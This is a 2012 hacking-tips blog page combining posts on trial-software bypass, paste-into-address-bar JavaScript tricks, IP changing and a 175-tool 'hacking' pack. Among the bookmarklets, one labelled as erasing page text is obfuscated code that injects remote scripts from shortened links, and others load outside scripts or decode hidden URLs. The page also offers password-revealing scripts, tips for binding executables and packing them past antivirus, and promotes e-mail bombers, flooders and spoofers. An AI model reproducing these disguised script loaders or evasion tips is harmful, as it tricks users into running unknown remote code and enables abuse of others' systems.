Sunday, June 3, 2012

Bypass software trail period and run software forever

There are many software’s available in web which are best in many ways depending upon the user. But these software’s are always paid one which needs to be purchased after certain period in order to use it.
But some software makers give a demo version of the software to try out before buying it which runs for a certain period and needs to be purchased in order to work again in your PC.
Many will uninstall the software and reinstall the software and will use it again as demo version. But there is way to use that trial software again and again without even uninstalling it.
TimeStopper does that. TimeStopper is a small software which just stops the time of any executable software file and will helps you in using that Trail software continuously without any trouble. It have very sinple user interface which is very easy to handle.
Now just download the Time Stopper from here


Then just install the TimeStopper in your PC
Now just Browse the Executable File (.exe file) of Require Software which will be usually located in C:\Program files\APPLICATION-NAME\ and now just select the new installation date.
Now extend to another 30/60/90 Days depending on the software
 
Features:
  • TimeStopper is a freeware.
  • Time Stopper is the software which can stop the time for try out version software.
  • When you stop the time you can use your trial versions forever.
  • When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time amp; date run normally on your system.
  • You can use any number of trial version software
Note that this program just extends the trial period of any software by changing the software installation date.
You can use this TimeStopper to extend the Trail Period of any software.

Awesome Javascript collection by ehackworld

Procedure:

1)Just copy the javascript and paste it in your browsers Address bar and hit enter


DOWNLOAD TXT FILE




Javascript which pop up a message:

javascript:function reverse() { var inp = " !!!..skcoR dlrowkcahe "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse()


Javascript to find passwords behind the astriks:

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
                                    
                                                          (OR) 

javascript:shum=document.getElementsByTagName('input');for(x=0;x<shum.length;x++){shumj=shum[x].type;if(shumj=="password"){shum[x].type="text"}};void(0)


Javascript to rotate images on webpage:

javascript: R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
                                                            
                                                                (OR)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

                                                                 (OR)

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)


Javascript which vibrates your browser:

javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!..skcoR dlrowkcahe"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();

                                                                 (OR)

javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)
                                       
                                                                     (OR)              

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6) 


Javascript which pop up message and changes text colour on webpage:

javascript:alert("Created by ehackworld.tk"); i=0; c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);


Javascript to Edit any webpage:

javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void 0


Javascript which erases the text on webpage:

javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 118, 97, 114, 32, 105, 44, 115, 44, 115, 115, 61, 91, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 106, 121, 115, 68, 57, 69, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 104, 73, 69, 74, 76, 39, 93, 59, 102, 111, 114, 40, 105, 61, 48, 59, 105, 33, 61, 115, 115, 46, 108, 101, 110, 103, 116, 104, 59, 105, 43, 43, 41, 123, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 46, 115, 114, 99, 61, 115, 115, 91, 105, 93, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 125, 118, 111, 105, 100, 40, 48, 41, 59))


funny javascript to fool your friends:

javascript:alert("Wait for few seconds......");nb=document.all[0].innerHTML.match(/[0-1]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:100'><b><b>Computer Hacked By ehackworld</b></b></font>";for(i=1;i<=100;i++){document.body.innerHTML+='<img src="http://bit.ly/iJ739S">';};void(0)


Javascript which opens two webpages on same Tab:

javascript:alert("Created by ehackworld.tk");document.body.innerHTML+='<iframe name="ls" width="1000" height="600"></iframe>';window[0].location="http://www.ehackworld.tk/";function lostsoul(){document.forms[1].target="ls";window[0].document.forms['accept_0'].submit();};void(setInterval(lostsoul,4000))


Javascript which changes text colour on a webpage:

javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0);javascript: pri=0; nil=["red","yellow","lime","violet","navy","blue"]; enilton=document.links;setInterval("pri++;enilton[pri % document.links.length].style.color=nil[pri % nil.length]",10);void(0); 


Javascript for Blinking text on webpage:

javascript: cor = "red"; var timer_1; function vagalume () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[20].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('vagalume ()',100)}; vagalume ()


Dom inspector Javascript:

javascript:prefFile=''; void(z=document.body.appendChild(document.createElement('script'))); void(z.language='javascript'); void(z.type='text/javascript'); void(z.src='http://bit.ly/nSSQw'); void(z.id='modi');


Javascript for Dancing text on webpage:

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0) 


Javascript to expand images on a webpage:

javascript:DI=document.images;connectionstring= "!gsso9..hl`fdr2-nqjts-bnl.hl`fdr.lhkhdt.0.257.207/1257-iof!";exec1="";function A(){for(i=1;i<connectionstring.length-1;i++){exec1=exec1 + String.fromCharCode(connectionstring.charCodeAt(i)+1);}DI[3].src=exec1;}function B(){if(DI[3].width<300){DI[3].width++;}}A();setInterval('B()',5); void(0);

                                                                      (OR)

javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5))

Use your Pen drive or USB hard drive as Virtual OS ~ Everything About Hack!! http://ehackworld.blogspot.com/2011/09/use-your-pen-drive-or-usb-hard-drive-as.html#ixzz1wj5lMjy0 Warning:DO not copy the content Under Creative Commons License: Attribution Use your Pen drive or USB hard drive as Virtual OS

Pen drive and portable USB hard disks are nowdays become a common method to transfer data between systems. But do you know that you can use any application directly from your pen drive or portable USB hard disk just by connecting your Pen drive to the any PC or laptop. Ahha you all are still in confusion, what actually i am talking about, so lets have better view.

Suppose you gone to your friends or simply college and there you want to use Microsoft excel or any other application but that is not installed on that system. Then what happen you got stuck and your work got halted there but if you have portable application for that which you can keep in your pen drive or portable hard disk and use it where ever you want then you will never face situations like above. But now you all will be thinking we need a lot of portable applications for that, right... yes are thinking in right way but Lupo pensuite has done that for us. Why don't we keep everything in our pocket and use it whenever , wherever we need the application. What it has done, it has kept all the daily use and critical applications in one portable installation which consist of all daily use applications like:
  • WEB BROWSERS
  • E-MAIL CLIENTS
  • MESSENGERS
  • P2P CLIENTS
  • WEB SERVERS
  • DOWNLOAD MANAGERS
  • FEED READERS
  • REMOTE CONTROL
  • BOOKMARKS MANAGERS:
  • FTP/SSH CLIENTS
  • PORTABLE WIKI
  • LINK CHECKER
  • PROXY SERVER
  • VIDEO PLAYERS
  • AUDIO PLAYERS
  • MEDIA EDITORS
  • MEDIA CONVERTERS
  • CD/DVD RIPPERS
  • TAG EDITORS
  • STREAM MANAGERS
  • CD/DVD BURNERS
  • VIDEO CAPTURE
  • IPOD MANAGERS
  • MEDIA INFO
  • MEDIA CATALOGERS
  • CD/DVD TOOLS
  • TEXT TO SPEECH
  • MEDIA CENTER
  • IMAGE VIEWERS
  • IMAGE EDITORS
  • GRAPHICS EDITORS
  • SCREEN CAPTURE
  • SCREEN ZOOMERS
  • ICON/CURSOR EDITORS
  • IMAGE PROCESSING
  • ALBUM CREATORS
  • COVER CREATOR
  • SYSTEM MANAGERS
  • SYSTEM INFORMATION
  • NETWORK TOOLS
  • MONITORING/TESTING TOOLS
  • PROGRAM LAUNCHERS
  • STARTUP MANAGERS
  • SCHEDULING MANAGERS
  • TWEAKERS
  • REGISTY TOOLS
  • DISK DEFRAG
  • VIRTUAL DESKTOP
  • UNINSTALL TOOLS
  • CLIPBOARD TOOLS
  • MOUSE/KEYBOARD TOOLS
  • FOLDER/WINDOW TOOLS
  • SHELL TOOLS
  • FILE ASSOCIATIONS
  • DEVICE TOOLS
  • DESKTOP TOOLS
  • PARTITION MANAGERS
  • MALWARE DETECTION
  • DISK/REGISTRY CLEANERS
  • ENCRYPTING
  • PASSWORD MANAGERS
  • FILE RECOVERY
  • SECURE DELETION
  • INTEGRITY CHECKERS
  • UNLOCKING TOOLS
  • Office SUITES
  • WORD PROCESSORS
  • SPREADSHEETS
  • TEXT EDITORS
  • PDF/TEXT READERS
  • PDF TOOLS
  • ORGANIZERS
  • PROJECT MANAGERS
  • FINANCIAL TOOLS
  • PUBLISHING
  • POST-IT
  • DIAGRAMMING
  • TEXT PROCESSING
  • FILE MANAGERS
  • FILE ARCHIVERS
  • FILE RENAMERS
  • FILE LISTERS
  • FILE SPLITTERS
  • BACKUP TOOLS
  • SYNCHRONIZERS
  • SEARCH/REPLACE TOOLS:
  • DUPLICATE FINDERS
  • FOLDER COMPARISON
  • FILE COPIERS
  • FONT MANAGERS
  • ATTRIBUTE TOOLS
  • DISK SIZE TOOLS
  • INSTALLER BUILDERS
  • DATABASE TOOLS
  • PROGRAMMING TOOLS
  • HEX EDITORS
  • EMULATORS
  • MATHEMATICS
  • UNIT CONVERTERS
  • ASTRONOMY
  • GENEALOGY
  • MUSIC TOOLS
  • DIDACTIC TOOLS
  • GAMES
  • LOGIC/PUZZLES
The list is little small but when you listen this installers size then you will be more shocked its only 200MB pen drive suite. Basically its a virtual OS that run from your pendrive and contains the all the applications that you need in day to day life...:P contains more than that..

Also you can add more and more portable application to your pensuite. That's the beauty of Lupo pensuite. So no need to worry while going to other's PC or system that he might have this software or not, keep everything in your pocket friends and enjoy the flavor of portability.
How to use Lupo Pensuite to use all applications from pen drive?
2. Install the Pen drive suite into you pendrive or portable USB hardisk.
3. Now go anywhere and just start exe to open the suite.
4. Select the application and use it directly from your pen drive.
5. That's all friends.

Make your Computer Talk

Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-

Steps:

Open Notepad.
Copy and paste the exact code given below.

Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message


3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as (anything)Speak.vbs or "*.vbs".
4.  Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.
 
 
 
Now your Computer will speak / talk what you typed in.

Sunday, May 27, 2012

SterJo Windows Key Finder

SterJo Windows Key Finder is a Portable Product Key Finder created by SterJo. It can be used to recover lost Windows or Office Product Keys. Ideally this Portable tool might be used to reveal Microsoft Windows XP, Vista, Windows 7, Office XP, Office 2003, Office 2007, and Office 2010 product keys. A user might then copy found keys to a text document for use down the road, when you might need to reinstall the Windows software.


SterJo Windows Product Key Finder

SterJo Key Finder

Authors Website: http://www.sterjosoft.com/key-finder.html
Extracted Size: 728 KB
License: Freeware
Download: You can grab this Free Product Key Finder Download

Optimize and Speed up PC by 1.5 times without any Hardware Upgrade





tools_computer_optimizationWhether you are a hardcore gamer or a normal computer user, you expect fast performance from your computer. Latest versions of browsers like Firefox and Google Chrome consumes too much memory and if you try to run applications like Skype or even Microsoft Office at the same time, you may face sluggish operation on your PC. It can lead to frustration and you might start thinking about upgrading the RAM, Processor etc. of your current configuration and that will cost you.
I would recommend to try performance booster software before upgrading the configuration of your system. Actually when a computer runs on certain operating system say Windows, It continuously runs few services, programs and processes in background even if they are not required to run. That means, you can stop those services or processes to free the memory and utilize that memory in processes that you want to run. That will boost or speed up the performance of your computer without upgrading the hardware. Earlier also we had shared few tips optimize PC performance through software, but today I am sharing a freeware which is capable of speeding up the performance of your computer by 1.5 times with single click. I am talking about JetBoost.com, a free software to optimize Windows PC to speed up the performance.
JetBoost does following things in your computer to improve the performance of PC.
  • Close process which are not required to run
  • Clean RAM (Random Access Memory) for better performance
  • Prioritize programs to speed up the start-up process or boot time
  • Free memory by removing the clipboard data
jetboost_optimization

If you want to play a game on your PC which actually consumes so much memory, this software will play an important role in your gaming experience. There is a special Gaming Optimization setting in this software that will optimize your PC to run the game without any interruption or any sluggish behavior. Once you set the optimization mode to “Game” before launching the game on your PC, it will disable all auto-updates, close explorer.exe to release system resources, set the power settings to give you responsive gaming experience. It will also close the normal work services which are not required at the time of gaming on PC.

Restore the stopped services

jetboost_restore

Once you completed the game on your PC, you can actually restore the system processes and services to make your computer as normal as it was before launching the game. Even when you optimize the PC for “Work” purpose or “Custom” mode, you can restore the system to earlier stage by clicking the “Restore” button. This is helpful if you are facing any issues after optimizing the system with JetBoost.

Other Alternatives to speed up performance of PC

There are lot many third-party software available to boost the performance of your system. Some of them actually tweaks the registry settings of your Windows to improve the experience. For example, Windows Vista users can try Vista Services Optimizer for better experience. Apart from third-party software, Windows itself is having few system tools to optimize the performance of your computer. For example, Disk De-fragmentation can improve the speed of your PC operation. Cleaning the temporary files manually or by using freeware to do so, you can improve the performance of your old computer.

Store and Share Images Online without Sign Up

                                                    imgur                                                                                                                           There are lot many places to store files online for free, for example Microsoft SkyDrive, ADrive. Recently Google Docs also started storing 1 GB data for free. There are also lot many services to host images and share them with a short URL, for example Twitpic. But at all these places, you need to sign up with your twitter ID or email ID, or your images will be seen with lot many ads running around. If you want to share only image, picture with your friends by uploading that somewhere then you may try Imgur.
Imgur.com is an online service started by a student named Alan Schaaf of Ohio University. This service is very very simple for sharing image, pictures with a single click. All you need to do is to upload the image from your local computer and then you will get a short URL. Now you can share that short URL with your friends. It also provides the HTML code to use the image on your own website by hosting the image on Imgur server.


Features of Imgur Image Share and Upload

  • Upload Images without any Signup
  • Share images, pictures, GIF animations with single click
  • Upload Images up to 10 MB in size
  • Animated Images of up to 2 MB can be uploaded
  • Supported File Formats are JPEG, GIF, PNG, APNG, TIFF, BNP, PDF, XCF
  • Files may remain there forever if keeps getting 1 view in 3 months    
You can use this service to share a picture having your email ID. This way you can stop getting spam on your email ID and share that as well.

Web Tools


                                                      

Here you can find some interesting basic web tools for finding your external IP address, sending anonymous e-mails and even broadcasting e-mails.



Handy webtools


Other Software Publishes by Mohammad Ahmadi Bidakhvidi

                                                           

Next to the Net Tools project I have some smaller projects running, mostly in Visual Basic and C++. These tools can be used by you. If you engage any illegal activities using this tool, I can't be hold responsible for it. There are still projects in progress... Soon these projects will be put online. I thank you for your patience. 



Process & Port Linker 1.1
This tool allows you to list all the processes used on your PC (microsoft OS), and see what port the process is using. So all processes will be linked to a certain port.
[ download ]
Port Scanner 1.0
This port scanner has the ability to scan multiple ports, multiple IPs, and is very fast. It has a very fast scan engine.
[ download ]
EXE Joiner 1.0
With this application you can join/add/bind two executables, so the joined EXE will execute both EXEs when run. However the most AV will detect the result as trojan.dropper. You can use packers or other techniques to resolve this issue and make the EXE undetectable. You can also see the tutorial on how to bind EXEs using Visual Basic 6.0.
[ download ]
Web Server 1.0
Web Server is an application that has the ability to make your computer a total server. Because of that users can browse to your local website on your hard drive. Next to that this application has the ablility to send anonym E-mails without an SMTP server input, because it will let your PC be one. Here are a few screenshots that help you doing this: [1] [2] [3] [4]
[ download ]

Mass Mailer by Mabsoft



                                                   
 Mass Mailer by Mabsoft
This tool is able to mass mail certain E-mail to a given E-mail by using a SMTP server. Very fast and clean code. Written in Visual Basis 6.0 and being tested on all Microsoft OS. This tool is being integrated in Net Tools 5.x
 Additional Information

There are thousands and thousands of free SMTP servers that you can use for free on the web. I advise you to use the search engine google to find some. At this moment I'm making an E-mail bomber that doesn't need any SMTP servers anymore, using it's own SMTP engine build in. I will publish it as soon as possible.


[ download ]

Saturday, May 12, 2012

OnlineJobsOpen

Friday, April 27, 2012

Cool Facebook Chat Images (Must Try)

Cool Facebook Chat Images (Must Try)


Cool Facebook Chat Images (Must Try)
Hi all users lets have fun with facebook below is some facebook chat image codes just paste it in your chat box of message box and see what will happen. But keep in mind that this only works in PC/Laptop and will not work if you're chatting from Mobile!). Don't try it in comments it will not work... try it in chat and msg from PC to your  friends.

1.Mask

[[255006724575192]] [[255006727908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]

2. Jack Sparrow

[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

3. Superman

[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

4. Elmo

[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]

5. Troll face

[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]

6. Mr. Bean

[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]
Enjoy.......

Google Images Search Under Water !!!

Google Images Search Under Water !!!

Hi all users, here is another great Google search bar which is Google Images Search Under Water as you see in below image. Recently I found this amazing page, where I notice that the Google logo is floating under the water with shark and fishes. It is looks like same as Google Gravity. In their search engine you can search any images and it will show the results than the image will goes on under water. The more you click on search link the more images will fall.

When you visit this cool page and type any keyword like Facebook or Twitter you will get some image results which will fall and goes down in under water. Since the text is in Chinese language which we can't understand but we know that this is only a "Google Search" button link. Moreover, when you hit the other button you will get a coin of the symbol of "G" and a "trophy cup". Have fun this amazing Google page, trying moving the elements with your mouse.
Click here to visit the search bar.
Enjoy.......

Change Your Ip In Less Then 1 Minute

Change Your Ip In Less Then 1 Minute


 Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"



You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Sunday, April 22, 2012

NetTools 5 - Ultimate Hacking Tools..over 175 in one pack


                                                  

Net Tools © 2011 Mohammad Ahmadi Bidakhvidi (project)

Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.

The Creation

Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista, 7). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.
Contents

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
